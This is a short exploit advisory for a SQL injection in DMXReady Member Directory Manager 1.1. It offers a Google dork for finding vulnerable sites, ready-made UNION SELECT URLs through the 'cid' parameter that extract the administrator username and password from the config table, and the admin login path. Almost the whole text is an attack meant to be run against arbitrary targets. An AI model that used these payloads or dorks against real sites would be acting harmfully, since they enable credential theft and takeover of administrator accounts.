DMXReady Member Direcotry Manager 1.1 SQL Injection

`*******************************************************************************  
# Title : DMXReady Member Directory Manager <= 1.1 SQL Injection Vulnerability  
# Author : ajann  
# Contact : :(   
# S.Page : http://www.dmxready.com  
# $$ : 99.97 $  
# Dork : inurl:inc_memberdirectorymanager.asp  
# DorkEx :  
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_memberdirectorymanager.asp&meta=  
  
****Stop Attack ABD and ISRAEL !  
  
  
*******************************************************************************  
  
*******************************************************************************  
  
[[SQL]]]---------------------------------------------------------  
  
http://[target]/[path]//admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]  
  
You Find-> http://[target]/[path]/applications/MemberDirectoryManager/inc_memberdirectorymanager.asp  
Edit -> http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]  
  
  
Example:  
  
USERNAME->  
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config  
  
PASSWORD->  
/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config  
  
Admin Login->  
/admin/MemberDirectoryManager/admin.asp  
  
[[/SQL]]  
  
"""""""""""""""""""""  
# ajann,Turkey  
# ...  
  
# Im not Hacker!  
  
`